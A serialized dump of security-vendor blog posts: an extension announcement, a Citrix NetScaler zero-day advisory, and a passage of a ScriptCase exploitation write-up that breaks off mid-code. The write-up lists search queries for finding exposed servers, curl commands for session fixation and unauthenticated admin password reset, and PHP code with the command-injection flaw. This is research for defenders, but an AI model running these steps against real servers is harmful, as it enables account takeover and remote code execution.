a CVE appears on your screen. We built it with the community in mind, making it easier to quickly see whether a vulnerability is being exploited without extra friction. Having the right information exactly where you need it feels magical. It delivers faster, smoother, and more authoritative vulnerability analysis while keeping you in your flow.",[18,33775,33776],{},"While that might sound like a throwback to the days of toolbars, pop-ups, and FarmVille, I think this is actually where the future’s headed. Performing A Google™ just isn’t what it used to be.",[18,33778,33779],{},"Here’s my workflow before:",[22,33781,33782,33785,33788,33791],{},[25,33783,33784],{},"Google the CVE.",[25,33786,33787],{},"Get the NVD link.",[25,33789,33790],{},"Wait for the page to load.",[25,33792,33793],{},"Stare at the page and realize…This tells me basically nothing.",[18,33795,33796,33797,33800],{},"Sure, I could ask one of the robots (ChatGPT, Claude, etc…), but they’ve been confidently wrong enough times that I don’t trust them when it really counts. What I want to know is straightforward: ",[295,33798,33799],{},"where is this CVE in the exploitation lifecycle?"," Do we know almost nothing, or is this thing actively fueling a botnet?",[18,33802,33803],{},"Why not just bring that answer right into the browser? Not just any answer either. The data behind VulnCheck Insights is comprehensive and timely, often surfacing exploitation intelligence weeks before it appears in places like NVD or even CISA’s KEV list. Not only are you keeping your workflow smooth, you are staying ahead of the curve with intelligence that outpaces the usual industry sources.",[61,33805,33807],{"id":33806},"a-little-origin-story",[295,33808,33809],{},"A Little Origin Story",[18,33811,33812],{},"This idea came together fast because our team saw the same pain point. Everywhere you look online, articles, advisories, and GitHub repos, CVEs are scattered like glitter. Unless you’re blessed with a photographic memory (or a non-dyslexic brain that can keep CVE-2025-5335 straight from CVE-2025-5353), you end up searching, clicking, waiting, and frustrated.",[18,33814,33815,33816,33819],{},"One of our engineers realized this was a quick win for VulnCheck data. Why force people into the “open tab → search → parse → repeat” loop when the answer could just ",[1131,33817,33818],{},"show up"," while you’re reading?",[61,33821,33823],{"id":33822},"gain-intelligence-without-leaving-the-page",[295,33824,33825],{},"Gain Intelligence without Leaving the Page",[18,33827,33828],{},"Here’s the rundown:",[22,33830,33831,33834,33837],{},[25,33832,33833],{},"You install the extension from the Chrome Web Store.",[25,33835,33836],{},"You insert your VulnCheck token into the settings.",[25,33838,33839],{},"Then you browse like normal.",[18,33841,33842],{},[68,33843],{"alt":33844,"src":33845},"screenshot-2","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreeshot-2.png",[18,33847,33848],{},"From there, the extension quietly highlights things like:",[22,33850,33851,33857],{},[25,33852,33853,33856],{},[295,33854,33855],{},"CVEs"," → you’ll see VulnCheck’s exploitation intel right there.",[25,33858,33859,33862],{},[295,33860,33861],{},"CPEs & PURLs"," → you’ll see how many CVEs are tied to them.",[18,33864,33865],{},"Hover, click, done. You don’t leave the page, you don’t lose your train of thought, you just get the intel you actually need.",[18,33867,33868],{},[68,33869],{"alt":33870,"src":33871},"13fb50ab-64c0-4f40-81c7-e959a05caeed.png","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002F13fb50ab-64c0-4f40-81c7-e959a05caeed.png",[61,33873,33875],{"id":33874},"see-what-vulnerabilities-matter-faster",[295,33876,33877],{},"See What Vulnerabilities Matter Faster!",[18,33879,33880],{},"Because speed matters.",[18,33882,33883],{},"When your CISO pings you a Hacker News link and asks about CVE-2025-43068, you don’t want to stall for half a day. You want to look like the wizard who already knows the answer and now you can.",[18,33885,33886],{},"Also, it keeps VulnCheck data in your natural workflow instead of buried in yet another tab (though, please, keep us open in a tab anyways! ;) ).",[18,33888,33889],{},[68,33890],{"alt":33891,"src":33892},"screenshot-3","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreenshot-3.png",[61,33894,33896],{"id":33895},"where-to-grab-it",[295,33897,33898],{},"Where To Grab It",[18,33900,33901,33902,15050],{},"👉 Install VulnCheck Insights on Chrome [",[47,33903,33904],{"href":33904,"rel":33905},"https:\u002F\u002Fchromewebstore.google.com\u002Fdetail\u002Fvulncheck-insights\u002Fialmnppnmajmaeibknkgfihffkobnogp",[51],[18,33907,33908,33909,15050],{},"👉 Check out the docs [",[47,33910,33911],{"href":33911,"rel":33912},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Finsights",[51],[18,33914,33915],{},"And if you send us feedback, we’ll look at other browsers too. (Except Internet Explorer. May it rest in peace.)",[33917,33918],"youtube-video",{"id":33919,"title":33920},"8eu-rzk9uys","VulnCheck Insights Walkthrough",[61,33922,33924],{"id":33923},"the-short-version",[295,33925,33926],{},"The Short Version",[18,33928,33929],{},"We got tired of Googling CVEs and getting half-baked answers. We built VulnCheck Insights, a Chrome extension that puts vulnerability and exploitation intelligence right into the browser, right where you need it.",[18,33931,33932],{},"Install it. Use it. Show off to your co-workers when you answer their CVE question in minutes instead of hours.",[1920,33934,202],{"id":201},[18,33936,205],{},[18,33938,208],{},[18,33940,33941,33942,33945,33946,1240,33949,1246,33952,1255,33955,1260],{},"Sign up on our website today to get free access to our ",[47,33943,1233],{"href":10806,"rel":33944},[51],", enjoy our ",[47,33947,1239],{"href":1237,"rel":33948},[51],[47,33950,1245],{"href":1243,"rel":33951},[51],[47,33953,1251],{"href":1249,"rel":33954},[51],[47,33956,216],{"href":1258,"rel":33957},[51],[1920,33959],{"id":219},{"title":219,"searchDepth":220,"depth":220,"links":33961},[33962,33963,33964,33965,33966],{"id":33806,"depth":220,"text":33809},{"id":33822,"depth":220,"text":33825},{"id":33874,"depth":220,"text":33877},{"id":33895,"depth":220,"text":33898},{"id":33923,"depth":220,"text":33926},"2025-09-08",{},"\u002Fblog\u002Fvulncheck-insights-chrome-extension",{"title":3355,"description":3356},"blog\u002Fvulncheck-insights-chrome-extension",[33973,33173],"VulnCheck Insights","KeKPv1MhbqzkuhX-3Pz85b8oCw8AfpnPYf5wKa93uVo",{"id":33976,"title":30358,"articles":33977,"authors":34005,"body":34007,"date":33981,"description":34212,"extension":234,"image":7,"link":7,"meta":34213,"navigation":34214,"path":34215,"seo":34216,"series":7,"stem":34217,"subtype":7,"tags":34218,"__hash__":34219},"blog\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild.md",[33978,33982,33985,33988,33993,33997,34000],{"title":33979,"source":33345,"link":33980,"date":33981},"NetScaler ADC\u002FGateway zero-day exploited by attackers (CVE-2025-7775) – updated!","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2025\u002F08\u002F26\u002Fnetscaler-adc-gateway-zero-day-exploited-by-attackers-cve-2025-7775\u002F","2025-08-26",{"title":33983,"source":3500,"link":33984,"date":33981},"Three new Citrix NetScaler zero-days under active exploitation","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366629825\u002FThree-new-Citrix-NetScaler-zero-days-under-active-exploitation",{"title":33986,"source":19479,"link":33987,"date":33981},"Citrix NetScaler Devices Yet Again Under Attack","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcitrix-netscaler-devices-yet-again-under-attack-a-29301",{"title":33989,"source":33990,"link":33991,"date":33992},"Well look here! Another Netscaler 0day is getting exploited","The News Stack","https:\u002F\u002Fwww.thestack.technology\u002Fwell-look-here-another-netscaler-0day-is-getting-exploited\u002F","2025-08-27",{"title":33994,"source":33995,"link":33996,"date":33992},"Citrix patches critical zero-day, two other flaws","SC Mag","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fcitrix-patches-critical-zero-day-two-other-flaws",{"title":33998,"source":25048,"link":33999,"date":33992},"Patch now! Citrix addresses latest NetScaler zero-day, exploitation underway","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12554-patch-now-citrix-addresses-latest-netscaler-zero-day-exploitation-underway",{"title":34001,"source":34002,"link":34003,"date":34004},"Enterprises need to patch these Citrix flaws now","ITPro Today","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fenterprises-need-to-patch-these-citrix-flaws-now","2025-09-01",[34006],{"name":256,"link":258,"avatar":257,"linkName":219},{"type":15,"value":34008,"toc":34207},[34009,34024,34033,34061,34078,34087,34107,34111,34140,34142,34148,34162,34168,34170,34190],[22,34010,34011,34014,34021],{},[25,34012,34013],{},"Citrix disclosed three new vulnerabilities affecting Citrix NetScaler ADC and NetScaler Gateway",[25,34015,34016,34017,34020],{},"The highest-severity vulnerability, ",[47,34018,32546],{"href":32544,"rel":34019},[51],", has been exploited in the wild",[25,34022,34023],{},"The disclosure also includes a new vulnerability in the NetScaler management interface, which should not be exposed to the internet and should be prioritized alongside the more severe issues",[18,34025,34026,34027,34032],{},"On August 26, 2025, Cloud Software Group ",[47,34028,34031],{"href":34029,"rel":34030},"https:\u002F\u002Fsupport.citrix.com\u002Fsupport-home\u002Fkbsearch\u002Farticle?articleNumber=CTX694938",[51],"disclosed three new vulnerabilities"," in Citrix NetScaler ADC and NetScaler Gateway. The most severe of these, CVE-2025-7775, has been exploited in the wild.",[22,34034,34035,34045,34053],{},[25,34036,34037,34040,34041],{},[47,34038,32546],{"href":32544,"rel":34039},[51]," (CVSS v4: 9.2): A memory overflow vulnerability that allows for remote code execution and\u002For denial of service in various NetScaler ",[47,34042,34044],{"href":34029,"rel":34043},[51],"configurations",[25,34046,34047,34052],{},[47,34048,34051],{"href":34049,"rel":34050},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-7776",[51],"CVE-2025-7776"," (CVSS v4: 8.8): A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial of service in NetScalers configured as Gateways with PCoIP Profiles bounded to them",[25,34054,34055,34060],{},[47,34056,34059],{"href":34057,"rel":34058},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8424",[51],"CVE-2025-8424"," (CVSS v4: 8.7): An improper access control vulnerability in the NetScaler Management Interface; requires access to NSIP, Cluster Management IP, or local GSLB Site IP or SNIP with Management Access",[18,34062,34063,34064,34069,34070,34073,34074,59],{},"Roughly 14,300 Citrix NetScaler instances ",[47,34065,34068],{"href":34066,"rel":34067},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.title%3A%22Citrix+Gateway%22+%2Bssl%3A%22O%3D%22",[51],"were exposed"," to the public internet at time of disclosure (August 26). ",[47,34071,32546],{"href":32544,"rel":34072},[51]," has been added to the ",[47,34075,34077],{"href":1231,"rel":34076},[51],"VulnCheck KEV list",[18,34079,34080,34081,34086],{},"Memory corruption vulnerabilities like CVE-2025-7775 and CVE-2025-7776 can be tricky to exploit and on the whole tend to be used by state-sponsored or other skilled adversaries in targeted attacks rather than leveraged by commodity attackers broadly. Another recent Citrix NetScaler vulnerability VulnCheck research has tracked, ",[47,34082,34085],{"href":34083,"rel":34084},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-6543",[51],"CVE-2025-6543",", has a description almost identical to CVE-2025-7775 (though CVE-2025-6543 has a narrower range of vulnerable configurations) and has yet to see exploitation at scale despite being on VulnCheck KEV since June 25.",[18,34088,34089,34090,34095,34096,10515,34101,34106],{},"While the Citrix advisory only explicitly mentions active exploitation of CVE-2025-7775, management interfaces for firewalls and security gateways have been ",[47,34091,34094],{"href":34092,"rel":34093},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Fconsole-chaos-targets-fortinet-fortigate-firewalls\u002F",[51],"targeted"," en masse in recent ",[47,34097,34100],{"href":34098,"rel":34099},"https:\u002F\u002Fwww.cyber.gc.ca\u002Fen\u002Falerts-advisories\u002Fsecuring-palo-alto-management-interfaces-exploitation",[51],"threat",[47,34102,34105],{"href":34103,"rel":34104},"https:\u002F\u002Fthehackernews.com\u002F2025\u002F05\u002Fsonicwall-confirms-active-exploitation.html",[51],"campaigns",". It's likely that exploit chains targeting these vulnerabilities in the future may try to combine an initial access flaw like CVE-2025-7775 with a flaw like CVE-2025-8424 with management interface compromise as a goal. Vulnerability response prioritization should include CVE-2025-8424 rather than being limited to the higher-severity (but harder-to-exploit) memory corruption CVEs alone.",[61,34108,34110],{"id":34109},"previous-netscaler-compromises","Previous NetScaler Compromises",[18,34112,34113,34114,34119,34120,1246,34123,1255,34128,34133,34134,34139],{},"The Netherlands' National Cyber Security Centre (NCSC) has a ",[47,34115,34118],{"href":34116,"rel":34117},"https:\u002F\u002Fwww.ncsc.nl\u002Factueel\u002Fnieuws\u002F2025\u002F07\u002F22\u002Fcasus-citrix-kwetsbaarheid",[51],"public advisory"," dated mid-August stating that NetScaler exploits had been used in \"a sophisticated attack that successfully targeted several Dutch organizations.\" Webshells were deployed on compromised devices; NCSC noted that compromised NetScalers were vulnerable to several known issues — namely, ",[47,34121,34085],{"href":34083,"rel":34122},[51],[47,34124,34127],{"href":34125,"rel":34126},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-5777",[51],"CVE-2025-5777",[47,34129,34132],{"href":34130,"rel":34131},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-5349",[51],"CVE-2025-5349",", the first two of which were exploited as zero-days. NCSC didn't attribute the attacks to a specific adversary; they late released ",[47,34135,34138],{"href":34136,"rel":34137},"https:\u002F\u002Fgithub.com\u002FNCSC-NL\u002Fcitrix-2025",[51],"scripts"," to aid in threat hunting and compromise identification.",[61,34141,1782],{"id":1781},[18,34143,34144,34145,4606],{},"Organizations that use Citrix NetScaler should apply patches urgently and ensure the management interface is not exposed to the internet. Fixed versions are below, as indicated in the vendor ",[47,34146,5359],{"href":34029,"rel":34147},[51],[22,34149,34150,34153,34156,34159],{},[25,34151,34152],{},"NetScaler ADC and NetScaler Gateway 14.1-47.48 and later releases",[25,34154,34155],{},"NetScaler ADC and NetScaler Gateway 13.1-59.22 and later releases of 13.1",[25,34157,34158],{},"NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.241 and later releases of 13.1-FIPS and 13.1-NDcPP",[25,34160,34161],{},"NetScaler ADC 12.1-FIPS and 12.1-NDcPP 12.1-55.330 and later releases of 12.1-FIPS and 12.1-NDcPP",[34163,34164,34165],"prose-note",{},[18,34166,34167],{},"Patching vulnerable software alone does not remediate compromises or eject threat actors from systems they have infiltrated",[61,34169,202],{"id":201},[18,34171,33489,34172,1246,34177,34182,34183,34189],{},[47,34173,34175],{"href":32015,"rel":34174},[51],[1131,34176,32017],{},[47,34178,34180],{"href":31538,"rel":34179},[51],[1131,34181,31540],{},", and our ",[47,34184,34186],{"href":31530,"rel":34185},[51],[1131,34187,34188],{},"1H 2025 State of Exploitation"," report.",[18,34191,1228,34192,1234,34195,1240,34198,1246,34201,1255,34204,1260],{},[47,34193,1233],{"href":10806,"rel":34194},[51],[47,34196,1239],{"href":1237,"rel":34197},[51],[47,34199,1245],{"href":1243,"rel":34200},[51],[47,34202,1251],{"href":1249,"rel":34203},[51],[47,34205,216],{"href":1258,"rel":34206},[51],{"title":219,"searchDepth":220,"depth":220,"links":34208},[34209,34210,34211],{"id":34109,"depth":220,"text":34110},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"Three new Citrix NetScaler vulnerabilities were disclosed on August 26, including CVE-2025-7775, a fresh zero-day flaw being used in the wild",{},{"title":30358},"\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",{"title":30358,"description":34212},"blog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",[242,1281],"IYc5w7NMq3pb4t9HUySROrR4Z9Z9oxlsybdof4KlrMI",{"id":34221,"title":34222,"articles":7,"authors":34223,"body":34225,"date":35956,"description":35957,"extension":234,"image":7,"link":7,"meta":35958,"navigation":237,"path":35960,"seo":35961,"series":7,"stem":35962,"subtype":7,"tags":35963,"__hash__":35965},"blog\u002Fblog\u002Fscriptcase-rce.md","ScriptCase - Hunt It, Exploit It, Defend It",[34224],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":34226,"toc":35954},[34227,34230,34232,34250,34254,34257,34260,34267,34273,34284,34295,34301,34318,34324,34335,34341,34344,34347,34357,34364,34375,34378,34387,34390,34399,34405,34411,34420,34423,34429,34432,34438,34453,35105,35108,35350,35356,35362,35365,35479,35482,35527,35534,35677,35680,35682,35685,35691,35702,35707,35711,35714,35858,35868,35874,35877,35883,35892,35894,35900,35902,35932,35949,35951],[263,34228],{":list":34229,"ico":266,"title":20},"[\"Hundreds of ScriptCase instances remain exposed a month after disclosure, with attackers actively scanning for them.\",\"Exploitation is simple, requiring only a few curl commands once a target is found, allowing full remote code execution.\",\"Clear detection paths exist, including version strings, network signatures, and suspicious processes or PHP files in the webroot.\"]",[1920,34231,11648],{"id":11647},[18,34233,34234,34235,34238,34239,982,34244,34249],{},"One month ago, Synacktiv",[1373,34236,34237],{},"^1"," published their disclosure and deep dive on a vulnerability chain affecting ScriptCase. The vulnerabilities, ",[47,34240,34243],{"href":34241,"rel":34242},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-47227",[51],"CVE-2025-47227",[47,34245,34248],{"href":34246,"rel":34247},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-47228",[51],"CVE-2025-47228",", are an unauthenticated password reset and an authenticated command injection that, when combined, give an unauthenticated attacker full remote code execution. And yet, despite public disclosure, functional exploits, and available patches, hundreds of ScriptCase instances remain exposed on the Internet.",[1920,34251,34253],{"id":34252},"does-this-matter","Does This Matter?",[18,34255,34256],{},"That leaves the obvious question: does this matter enough to go hunting?",[18,34258,34259],{},"At VulnCheck, one way we determine if a vulnerability matters is by looking for targets online. The logic is pretty easy: if there are zero targets online, well, who cares? If there are many targets online, then we care. If it’s somewhere in between 0 and many... it depends.",[18,34261,34262,34263,34266],{},"Naively, we started with a Shodan query of ",[886,34264,34265],{},"title:”ScriptCase”",". The results were annoying.",[18,34268,34269],{},[68,34270],{":width":10862,"alt":34271,"src":34272},"Shodan query with all honeypots","\u002Fblog\u002Fscriptcase-rce\u002Fhoneypots.png",[18,34274,34275,34276,34283],{},"Annoying because they aren’t real ScriptCase servers at all. These are honeypots. Frankenpots that seemingly pollute every single query. We’ve written before about the problem in There are ",[1131,34277,34278],{},[47,34279,34282],{"href":34280,"rel":34281},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ftoo-many-honeypots",[51],"Too Many Damn Honeypots",", and this is another textbook case.",[18,34285,34286,34287,34290,34291,34294],{},"But the fact that there are honeypots suggests that others care about ScriptCase too. So we grabbed a copy of the software, built a Shodan query",[1373,34288,34289],{},"^2"," to avoid the decoys, and, in a rare win, even got a Google dork",[1373,34292,34293],{},"^3"," to work (The AI-slopification of Google has largely destroyed good dorking, so this felt like a small miracle).",[18,34296,34297],{},[68,34298],{":width":10862,"alt":34299,"src":34300},"Dork results for ScriptCase","\u002Fblog\u002Fscriptcase-rce\u002Fscriptcase-google-dork.png",[18,34302,2245,34303,34307,34308,34313,34314,34317],{},[47,34304,34306],{"href":1243,"rel":34305},[51],"VulnCheck Initial Access Intelligence"," team routinely develops queries for Shodan, FOFA, ZoomEye, and Censys to track down vulnerable targets. While building out our fingerprints for ScriptCase on these services, we also found that our friends over at ",[47,34309,34312],{"href":34310,"rel":34311},"https:\u002F\u002Fdriftnet.io\u002F",[51],"driftnet"," had turned up a solid hit count of roughly 2,800 ScriptCase servers exposed to the Internet via their ",[886,34315,34316],{},"Scan Content"," functionality.",[18,34319,34320],{},[68,34321],{":width":10862,"alt":34322,"src":34323},"driftnet results for ScriptCase","\u002Fblog\u002Fscriptcase-rce\u002Fdriftnet-search.png",[18,34325,34326,34327,34330,34331,34334],{},"Finally, it’s not just researchers looking for ScriptCase. GreyNoise is tracking",[1373,34328,34329],{},"^4"," a couple dozen known malicious IPs scanning specifically for ",[886,34332,34333],{},"\u002Fscriptcase\u002F",". That’s proof attackers are on the hunt too.",[18,34336,34337],{},[68,34338],{":width":10862,"alt":34339,"src":34340},"GreyNoise sees scanning for ScriptCase","\u002Fblog\u002Fscriptcase-rce\u002Fgreynoise-search.png",[18,34342,34343],{},"At the end of the day, you’ve got all the ingredients to answer \"does this matter?\" There are discoverable targets online. There’s a public proof of concept. And attackers are actively looking for these systems. That matters.",[1920,34345,34346],{"id":31287},"Exploitation",[18,34348,34349,34350,34353,34354,34356],{},"If finding vulnerable ScriptCase servers is straightforward, exploiting them is even easier. Synacktiv’s blog and proof-of-concept",[1373,34351,34352],{},"^5"," go into detail, but the reality is that it boils down to just a few ",[886,34355,1557],{}," commands. No custom tooling required.",[18,34358,34359,34360,34363],{},"The first request establishes a fixed ",[886,34361,34362],{},"PHPSESSID",", which we’ll carry through the rest of the chain.",[1354,34365,34369],{"className":34366,"code":34367,"language":34368,"meta":219,"style":219},"language-console shiki shiki-themes material-theme-lighter github-light github-dark monokai","curl -H \"Cookie: PHPSESSID=fixated\" -H \"Accept-Language: en-us\" http:\u002F\u002F10.9.49.69:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php\n","console",[886,34370,34371],{"__ignoreMap":219},[1373,34372,34373],{"class":1375,"line":1376},[1373,34374,34367],{"class":9383},[18,34376,34377],{},"The second request generates the captcha we’ll need for the password reset. This is probably the one feature that will slow down mass exploitation from tools like Nuclei. Synacktiv’s GitHub exploit tries to solve it with OCR (which is incredibly cool!), but success isn’t guaranteed.",[1354,34379,34381],{"className":34366,"code":34380,"language":34368,"meta":219,"style":219},"curl -H \"Cookie: PHPSESSID=fixated\" -H \"Accept-Language: en-us\" http:\u002F\u002F10.9.49.69:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Flib\u002Fphp\u002Fsecureimage.php -o \u002Ftmp\u002Fcaptcha.png\n",[886,34382,34383],{"__ignoreMap":219},[1373,34384,34385],{"class":1375,"line":1376},[1373,34386,34380],{"class":9383},[18,34388,34389],{},"Opening the file will reveal the captcha text. On Linux, something like:",[1354,34391,34393],{"className":34366,"code":34392,"language":34368,"meta":219,"style":219},"xdg-open \u002Ftmp\u002Fcaptcha.png\n",[886,34394,34395],{"__ignoreMap":219},[1373,34396,34397],{"class":1375,"line":1376},[1373,34398,34392],{"class":9383},[18,34400,34401],{},[68,34402],{":width":10862,"alt":34403,"src":34404},"ScriptCase generated captcha","\u002Fblog\u002Fscriptcase-rce\u002Fcaptcha.png",[18,34406,34407,34408,59],{},"With the captcha value in hand, we can reset the password to one of our choosing, as long as it meets the requirements. Below we are setting the password to ",[886,34409,34410],{},"KLRxWQONIp41",[1354,34412,34414],{"className":34366,"code":34413,"language":34368,"meta":219,"style":219},"curl -H \"Cookie: PHPSESSID=fixated\" -H \"Accept-Language: en-us\" http:\u002F\u002F10.9.49.69:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php -d \"ajax=nm&nm_action=change_pass&email=email@email.com&pass_new=KLRxWQONIp41&pass_conf=KLRxWQONIp41&lang=en-us&captcha=TLEB\"\n",[886,34415,34416],{"__ignoreMap":219},[1373,34417,34418],{"class":1375,"line":1376},[1373,34419,34413],{"class":9383},[18,34421,34422],{},"Once the reset has been achieved, we can navigate to the production environment login page and authenticate with the new credentials.",[18,34424,34425],{},[68,34426],{":width":10862,"alt":34427,"src":34428},"ScriptCase authentication prompt","\u002Fblog\u002Fscriptcase-rce\u002Fprod-auth.png",[18,34430,34431],{},"Once authenticated, we land in the production environment.",[18,34433,34434],{},[68,34435],{":width":10862,"alt":34436,"src":34437},"ScriptCase post-authentication in production","\u002Fblog\u002Fscriptcase-rce\u002Fprod-post-auth.png",[18,34439,34440,34441,34444,34445,34448,34449,34452],{},"With access to the production environment, we can move on to ",[47,34442,34248],{"href":34246,"rel":34443},[51],", a command injection vulnerability in the connection creation and testing feature. The injection logic lives in a modified version of the third-party library ADOdb",[1373,34446,34447],{},"^6",". First, the command is built in ",[886,34450,34451],{},"$str_command"," using attacker-provided variables.",[1354,34454,34456],{"className":1367,"code":34455,"language":1369,"meta":219,"style":219},"function getSSHCommand($arr_ssh)\n{\n $hosts = \"known_hosts\";\n if($this->getSO() != 'windows')\n {\n $hosts = \"\u002Ftmp\u002Fknown_hosts\";\n }\n $str_command = \"ssh -o UserKnownHostsFile=\". $hosts .\" -o StrictHostKeyChecking=no -fNg -L \". $arr_ssh['ssh_localportforwarding'] .\":\". $arr_ssh['ssh_localserver'] .\":\". $arr_ssh['ssh_localport'] .\" \". $arr_ssh['ssh_user'] .\"@\". $arr_ssh['ssh_server'];\n if(!empty($arr_ssh['ssh_port']))\n {\n $str_command .= \" -p \" . $arr_ssh['ssh_port'];\n }\n if(!empty($arr_ssh['ssh_privatecert']))\n {\n $arr_ssh['ssh_privatecert'] = str_replace(\"\\\\\", \"\u002F\", $arr_ssh['ssh_privatecert']);\n\n if(strpos($arr_ssh['ssh_privatecert'], \" \")!==false)\n {\n $arr_ssh['ssh_privatecert'] = '\"' . $arr_ssh['ssh_privatecert'] . '\"';\n }\n $str_command .= \" -i \" . $arr_ssh['ssh_privatecert'];\n }\n $str_command .= \" sleep 60 > \";\n $tmp = \"null\";\n if($this->getSO() != 'windows')\n {\n $tmp = \"\u002Fdev\u002Fnull\";\n }\n $str_command .= $tmp;\n\n return $str_command;\n}\n",[886,34457,34458,34473,34477,34496,34526,34530,34548,34553,34700,34727,34731,34763,34767,34792,34796,34851,34855,34892,34897,34948,34953,34984,34988,35005,35022,35046,35050,35066,35070,35085,35089,35101],{"__ignoreMap":219},[1373,34459,34460,34462,34465,34468,34471],{"class":1375,"line":1376},[1373,34461,8560],{"class":7293},[1373,34463,34464],{"class":7297}," getSSHCommand",[1373,34466,34467],{"class":1383},"($",[1373,34469,34470],{"class":4640},"arr_ssh",[1373,34472,11875],{"class":1383},[1373,34474,34475],{"class":1375,"line":220},[1373,34476,8904],{"class":1383},[1373,34478,34479,34482,34485,34487,34489,34492,34494],{"class":1375,"line":1266},[1373,34480,34481],{"class":1383}," $",[1373,34483,34484],{"class":4640},"hosts ",[1373,34486,5417],{"class":1397},[1373,34488,4883],{"class":1387},[1373,34490,34491],{"class":1391},"known_hosts",[1373,34493,183],{"class":1387},[1373,34495,4912],{"class":1383},[1373,34497,34498,34501,34503,34507,34509,34512,34514,34517,34519,34522,34524],{"class":1375,"line":1852},[1373,34499,34500],{"class":4636}," if",[1373,34502,1384],{"class":1383},[1373,34504,34506],{"class":34505},"sSBr1","$this",[1373,34508,4667],{"class":1397},[1373,34510,34511],{"class":7297},"getSO",[1373,34513,7514],{"class":1383},[1373,34515,34516],{"class":1397}," !=",[1373,34518,4713],{"class":1387},[1373,34520,34521],{"class":1391},"windows",[1373,34523,1388],{"class":1387},[1373,34525,11875],{"class":1383},[1373,34527,34528],{"class":1375,"line":4692},[1373,34529,28226],{"class":1383},[1373,34531,34532,34535,34537,34539,34541,34544,34546],{"class":1375,"line":4724},[1373,34533,34534],{"class":1383}," $",[1373,34536,34484],{"class":4640},[1373,34538,5417],{"class":1397},[1373,34540,4883],{"class":1387},[1373,34542,34543],{"class":1391},"\u002Ftmp\u002Fknown_hosts",[1373,34545,183],{"class":1387},[1373,34547,4912],{"class":1383},[1373,34549,34550],{"class":1375,"line":4756},[1373,34551,34552],{"class":1383}," }\n",[1373,34554,34555,34557,34560,34562,34564,34567,34569,34571,34573,34575,34577,34579,34582,34584,34586,34588,34590,34592,34594,34597,34599,34601,34603,34605,34607,34609,34611,34613,34615,34617,34619,34622,34624,34626,34628,34630,34632,34634,34636,34638,34640,34642,34644,34647,34649,34651,34653,34655,34657,34659,34661,34663,34665,34667,34670,34672,34674,34676,34678,34680,34682,34684,34686,34688,34690,34692,34695,34697],{"class":1375,"line":4768},[1373,34556,34481],{"class":1383},[1373,34558,34559],{"class":4640},"str_command ",[1373,34561,5417],{"class":1397},[1373,34563,4883],{"class":1387},[1373,34565,34566],{"class":1391},"ssh -o UserKnownHostsFile=",[1373,34568,183],{"class":1387},[1373,34570,59],{"class":1397},[1373,34572,4656],{"class":1383},[1373,34574,34484],{"class":4640},[1373,34576,59],{"class":1397},[1373,34578,183],{"class":1387},[1373,34580,34581],{"class":1391}," -o StrictHostKeyChecking=no -fNg -L ",[1373,34583,183],{"class":1387},[1373,34585,59],{"class":1397},[1373,34587,4656],{"class":1383},[1373,34589,34470],{"class":4640},[1373,34591,7035],{"class":1383},[1373,34593,1388],{"class":1387},[1373,34595,34596],{"class":1391},"ssh_localportforwarding",[1373,34598,1388],{"class":1387},[1373,34600,15050],{"class":1383},[1373,34602,1398],{"class":1397},[1373,34604,183],{"class":1387},[1373,34606,4606],{"class":1391},[1373,34608,183],{"class":1387},[1373,34610,59],{"class":1397},[1373,34612,4656],{"class":1383},[1373,34614,34470],{"class":4640},[1373,34616,7035],{"class":1383},[1373,34618,1388],{"class":1387},[1373,34620,34621],{"class":1391},"ssh_localserver",[1373,34623,1388],{"class":1387},[1373,34625,15050],{"class":1383},[1373,34627,1398],{"class":1397},[1373,34629,183],{"class":1387},[1373,34631,4606],{"class":1391},[1373,34633,183],{"class":1387},[1373,34635,59],{"class":1397},[1373,34637,4656],{"class":1383},[1373,34639,34470],{"class":4640},[1373,34641,7035],{"class":1383},[1373,34643,1388],{"class":1387},[1373,34645,34646],{"class":1391},"ssh_localport",[1373,34648,1388],{"class":1387},[1373,34650,15050],{"class":1383},[1373,34652,1398],{"class":1397},[1373,34654,183],{"class":1387},[1373,34656,4883],{"class":1387},[1373,34658,59],{"class":1397},[1373,34660,4656],{"class":1383},[1373,34662,34470],{"class":4640},[1373,34664,7035],{"class":1383},[1373,34666,1388],{"class":1387},[1373,34668,34669],{"class":1391},"ssh_user",[1373,34671,1388],{"class":1387},[1373,34673,15050],{"class":1383},[1373,34675,1398],{"class":1397},[1373,34677,183],{"class":1387},[1373,34679,7318],{"class":1391},[1373,34681,183],{"class":1387},[1373,34683,59],{"class":1397},[1373,34685,4656],{"class":1383},[1373,34687,34470],{"class":4640},